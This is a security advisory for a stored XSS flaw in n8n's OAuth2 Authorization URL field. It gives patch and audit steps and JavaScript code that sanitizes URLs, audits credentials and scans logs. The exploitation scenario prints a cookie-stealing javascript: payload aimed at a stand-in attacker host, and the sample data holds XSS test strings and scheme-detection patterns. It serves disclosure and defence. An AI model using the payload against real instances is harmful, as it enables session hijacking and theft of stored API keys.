n8n: stored XSS via malicious OAuth2 Authorization URL
Any organization running n8n as an AI agent orchestration layer should treat this as urgent: a malicious insider or compromised account with credential-creation rights can plant a stored XSS payload that fires when a target admin interacts with OAuth, potentially handing over full session control and all connected API keys (OpenAI, Slack, databases). Upgrade to 2.8.0+ or 2.6.4+ immediately; until then, restrict credential creation to a minimal list of fully trusted users and audit existing OAuth2 credentials for javascript: scheme URLs.
Affected Systems
| Package | Ecosystem | Vulnerable Range | Patched |
|---|---|---|---|
| n8n | npm | >= 2.7.0, < 2.8.0 | 2.8.0 |
Severity & Risk
Recommended Action
1. PATCH: Upgrade to n8n 2.8.0 or 2.6.4 immediately; these versions sanitize the Authorization URL field.
2. AUDIT: Query existing OAuth2 credentials for entries with 'javascript:' or 'data:' scheme URLs; revoke any suspicious credentials.
3. RESTRICT: Tighten credential creation and sharing permissions to the minimum necessary set of users until patched.
4. DETECT: Add WAF rules or log-based alerts for 'javascript:' or 'vbscript:' patterns in n8n API requests to credential endpoints.
5. SCOPE: Inventory all API keys and tokens stored in n8n; rotate any that may have been exposed if exploitation cannot be ruled out.
Classification
Compliance Impact
This CVE is relevant to:
Technical Details
NVD Description
## Impact
An authenticated user with permission to create and share credentials could craft a malicious OAuth2 credential containing a JavaScript URL in the Authorization URL field. If a victim opened the credential and interacted with the OAuth authorization button, the injected script would execute in their browser session.
## Patches
The issue has been fixed in n8n versions 2.8.0 and 2.6.4. Users should upgrade to one of these versions or later to remediate the vulnerability.
## Workarounds
If upgrading is not immediately possible, administrators should consider the following temporary mitigations:
- Limit credential creation and sharing permissions to fully trusted users only.
- Restrict access to the n8n instance to trusted users only.
These workarounds do not fully remediate the risk and should only be used as short-term mitigation measures.
Exploitation Scenario
A disgruntled team member or attacker who has compromised a low-privilege n8n account (e.g., a developer account) creates an OAuth2 credential named something innocuous like 'Slack Integration (Prod)'. In the Authorization URL field they inject: javascript:fetch('https://c2.attacker.io/x?s='+document.cookie). They share this credential with a target admin. The admin, seeing a familiar-looking credential, opens it and clicks the 'Connect' or 'Authorize' button to verify or update it. The injected script executes in the admin's browser session, exfiltrating session cookies to the attacker's C2. The attacker replays the session token, gaining full admin access to n8n and all stored credentials—including OpenAI API keys, database connection strings, and downstream service tokens.
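The three defensive steps the advisory describes (sanitizing the Authorization URL field, auditing stored OAuth2 credentials, and alerting on dangerous URL schemes in requests to credential endpoints) are shown below in one added JavaScript example. This is not n8n's own code: the credential type name `oAuth2Api`, the `data.authUrl` field, the `/rest/credentials` path, and the shapes of the export records and log lines are assumptions modelled on n8n and should be checked against your version. The sample export and log lines are constructed for this example.

```javascript
// Added example, not n8n's own code. Shows (1) the allow-list check an OAuth2
// "Authorization URL" should pass before it is stored or rendered into a clickable
// button, (2) an audit over a decrypted credential export and (3) a scan of
// request-log lines for the scheme patterns the advisory recommends alerting on.
// ASSUMPTIONS: type "oAuth2Api", field data.authUrl, path /rest/credentials, and
// the export/log record shapes are modelled on n8n, not taken from its source.

const ALLOWED_SCHEMES = new Set(['http:', 'https:']);
const DANGEROUS_SCHEME = /^(javascript|data|vbscript):/i;

// Mirror what browsers do before resolving a URL: drop tab/CR/LF anywhere and
// leading/trailing C0 controls and spaces, so "java\tscript:" or " JavaScript:"
// cannot slip past a naive prefix check.
function normalizeUrl(raw) {
  return String(raw)
    .replace(/[\t\n\r]/g, '')
    .replace(/^[\u0000-\u0020]+|[\u0000-\u0020]+$/g, '');
}

// Allow-list on the parsed scheme: only absolute http(s) URLs pass. Relative or
// unparseable input throws inside the URL constructor and is rejected too.
function isSafeAuthorizationUrl(raw) {
  let parsed;
  try {
    parsed = new URL(normalizeUrl(raw));
  } catch {
    return false;
  }
  return ALLOWED_SCHEMES.has(parsed.protocol);
}

// Returns the canonical URL to store, or null when the input must be refused.
function sanitizeAuthorizationUrl(raw) {
  return isSafeAuthorizationUrl(raw) ? new URL(normalizeUrl(raw)).href : null;
}

// AUDIT: run over a decrypted credential export (array of {id, name, type, data}).
// Flags every OAuth2 credential whose authUrl is missing or not a safe http(s) URL.
function auditCredentialExport(records) {
  return records
    .filter((r) => r.type === 'oAuth2Api' && !isSafeAuthorizationUrl(r.data?.authUrl ?? ''))
    .map((r) => ({ id: r.id, name: r.name, authUrl: r.data?.authUrl }));
}

// DETECT: walk a parsed request body and report every string value, at any
// depth, that starts with a dangerous scheme after normalization.
function findDangerousValues(value, path = '$') {
  if (typeof value === 'string') {
    return DANGEROUS_SCHEME.test(normalizeUrl(value)) ? [{ field: path, value }] : [];
  }
  if (value && typeof value === 'object') {
    return Object.entries(value).flatMap(([k, v]) => findDangerousValues(v, `${path}.${k}`));
  }
  return [];
}

// Scan JSON request-log lines; only calls to the credential endpoint are checked.
function scanRequestLog(lines, credentialPathPrefix = '/rest/credentials') {
  const alerts = [];
  for (const line of lines) {
    let entry;
    try { entry = JSON.parse(line); } catch { continue; }   // skip non-JSON lines
    if (!String(entry.path ?? '').startsWith(credentialPathPrefix)) continue;
    for (const hit of findDangerousValues(entry.body ?? {})) {
      alerts.push({ user: entry.user, path: entry.path, ...hit });
    }
  }
  return alerts;
}

// Constructed sample data so the example runs stand-alone.
const SAMPLE_EXPORT = [
  { id: '1', name: 'Google OAuth', type: 'oAuth2Api',
    data: { authUrl: 'https://accounts.google.com/o/oauth2/v2/auth' } },
  { id: '2', name: 'Slack Integration (Prod)', type: 'oAuth2Api',
    data: { authUrl: 'JavaScript:alert(document.domain)' } },
  { id: '3', name: 'DB', type: 'postgres', data: { host: 'db.internal' } },
];
const SAMPLE_LOG = [
  '{"user":"dev1","path":"/rest/credentials","body":{"type":"oAuth2Api","data":{"authUrl":"https://login.example.com/authorize"}}}',
  '{"user":"dev2","path":"/rest/credentials","body":{"type":"oAuth2Api","data":{"authUrl":"java\\tscript:alert(1)"}}}',
  '{"user":"dev3","path":"/rest/workflows","body":{"name":"javascript:notAUrlField"}}',
  'not json at all',
];

console.log('audit:', auditCredentialExport(SAMPLE_EXPORT));
console.log('alerts:', scanRequestLog(SAMPLE_LOG));
```

Two design points matter in practice. The check is an allow-list on the parsed scheme rather than a deny-list on a string prefix, because the browser strips tabs and newlines and ignores case before deciding what `javascript:` means, so `java\tscript:` or ` JavaScript:` would pass a naive `startsWith('javascript:')` test. For the audit, n8n stores credential data encrypted, so the query has to run over a decrypted export (the n8n CLI's `export:credentials` command has a `--decrypted` option; confirm the exact invocation in the docs for your version) and the resulting file must be handled and deleted like any other secret. For detection, prefer inspecting the URL fields at a reverse proxy or WAF over persisting full credential request bodies, since those bodies also carry client secrets.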
Weaknesses (CWE)
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N
References
- github.com/advisories/GHSA-364x-8g5j-x2pr
- github.com/n8n-io/n8n/security/advisories/GHSA-364x-8g5j-x2pr